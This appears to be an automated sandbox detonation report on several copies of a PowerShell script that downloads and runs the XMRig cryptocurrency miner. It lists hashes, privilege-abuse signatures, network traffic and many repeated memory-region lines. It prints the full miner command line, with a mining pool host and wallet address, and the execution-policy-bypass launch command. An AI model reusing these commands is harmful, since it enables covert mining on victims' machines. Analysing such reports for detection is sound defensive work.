memory/1828-1-0x000001F966650000-0x000001F966672000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p25xlwga.fyt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1828-11-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/1828-12-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/1828-14-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/1828-15-0x000001F968BD0000-0x000001F968BE2000-memory.dmp

memory/1828-16-0x000001F968950000-0x000001F96895A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3292-47-0x0000028BD0050000-0x0000028BD0070000-memory.dmp

memory/3292-48-0x0000028BD0090000-0x0000028BD00B0000-memory.dmp

memory/1828-50-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/3292-49-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/1828-51-0x00007FFF0B583000-0x00007FFF0B585000-memory.dmp

memory/3292-52-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-55-0x0000028BD00D0000-0x0000028BD00F0000-memory.dmp

memory/3292-54-0x0000028BD00B0000-0x0000028BD00D0000-memory.dmp

memory/1828-53-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/3292-56-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/1828-57-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/3292-58-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-60-0x0000028BD00D0000-0x0000028BD00F0000-memory.dmp

memory/3292-59-0x0000028BD00B0000-0x0000028BD00D0000-memory.dmp

memory/3292-61-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-62-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-63-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-64-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-65-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-66-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-67-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-68-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-69-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-70-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-71-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-72-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-73-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-74-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-75-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-76-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-77-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-78-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-79-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-80-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-81-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-82-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-83-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-84-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-85-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-86-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-87-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-88-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-89-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-90-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-91-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-92-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-93-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-94-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-95-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-96-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-97-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-98-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-99-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-100-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-101-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-102-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-103-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-104-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-105-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-106-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-107-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-108-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-109-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-110-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-111-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-112-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-113-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-114-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-115-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-116-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-117-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-118-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

memory/3292-119-0x00007FF6FFE90000-0x00007FF700AC3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:52

Platform

win11-20240426-en

Max time kernel

1792s

Max time network

1777s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/1292-0-0x00007FF91E553000-0x00007FF91E555000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ny35ehk.zyo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1292-9-0x0000027077D60000-0x0000027077D82000-memory.dmp

memory/1292-10-0x00007FF91E550000-0x00007FF91F012000-memory.dmp

memory/1292-11-0x00007FF91E550000-0x00007FF91F012000-memory.dmp

memory/1292-12-0x00007FF91E550000-0x00007FF91F012000-memory.dmp

memory/1292-14-0x00000270782F0000-0x0000027078302000-memory.dmp

memory/1292-15-0x00000270782D0000-0x00000270782DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4128-46-0x0000029489BA0000-0x0000029489BC0000-memory.dmp

memory/4128-47-0x000002948B6B0000-0x000002948B6D0000-memory.dmp

memory/4128-48-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/1292-49-0x00007FF91E550000-0x00007FF91F012000-memory.dmp

memory/4128-52-0x000002948B6D0000-0x000002948B6F0000-memory.dmp

memory/4128-50-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-53-0x000002948B6F0000-0x000002948B710000-memory.dmp

memory/1292-51-0x00007FF91E553000-0x00007FF91E555000-memory.dmp

memory/1292-54-0x00007FF91E550000-0x00007FF91F012000-memory.dmp

memory/4128-55-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-56-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-57-0x000002948B6D0000-0x000002948B6F0000-memory.dmp

memory/4128-58-0x000002948B6F0000-0x000002948B710000-memory.dmp

memory/4128-59-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-60-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-61-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-62-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-63-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-64-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-65-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-66-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-67-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-68-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-69-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-70-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-71-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-72-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-73-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-74-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-75-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-76-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-77-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-78-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-79-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-80-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-81-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-82-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-83-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-84-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-85-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-86-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-87-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-88-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-89-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-90-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-91-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-92-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-93-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-94-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-95-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-96-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-97-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-98-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-99-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-100-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-101-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-102-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-103-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-104-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-105-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-106-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-107-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-108-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-109-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-110-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-111-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-112-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-113-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-114-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-115-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-116-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

memory/4128-117-0x00007FF7FA6B0000-0x00007FF7FB2E3000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:59

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

memory/4660-0-0x00007FFB06F83000-0x00007FFB06F85000-memory.dmp

memory/4660-10-0x0000024229AC0000-0x0000024229AE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5yy4l3rq.4ya.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4660-11-0x00007FFB06F80000-0x00007FFB07A41000-memory.dmp

memory/4660-12-0x00007FFB06F80000-0x00007FFB07A41000-memory.dmp

memory/4660-14-0x00007FFB06F80000-0x00007FFB07A41000-memory.dmp

memory/4660-16-0x0000024229830000-0x000002422983A000-memory.dmp

memory/4660-15-0x0000024229E90000-0x0000024229EA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/776-47-0x0000020F77B00000-0x0000020F77B20000-memory.dmp

memory/776-48-0x0000020F77B50000-0x0000020F77B70000-memory.dmp

memory/776-49-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-51-0x0000020F77B70000-0x0000020F77B90000-memory.dmp

memory/4660-52-0x00007FFB06F83000-0x00007FFB06F85000-memory.dmp

memory/776-50-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/4660-53-0x00007FFB06F80000-0x00007FFB07A41000-memory.dmp

memory/776-54-0x0000020F77B90000-0x0000020F77BB0000-memory.dmp

memory/776-55-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-56-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-57-0x0000020F77B70000-0x0000020F77B90000-memory.dmp

memory/776-58-0x0000020F77B90000-0x0000020F77BB0000-memory.dmp

memory/776-59-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-60-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-61-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-62-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-63-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-64-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-65-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-66-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-67-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-68-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-69-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-70-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-71-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-72-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-73-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-74-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-75-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-76-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-77-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-78-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-79-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-80-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-81-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-82-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-83-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-84-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-85-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-86-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-87-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-88-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-89-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-90-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-91-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-92-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-93-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-94-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-95-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-96-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-97-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-98-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-99-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-100-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-101-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-102-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

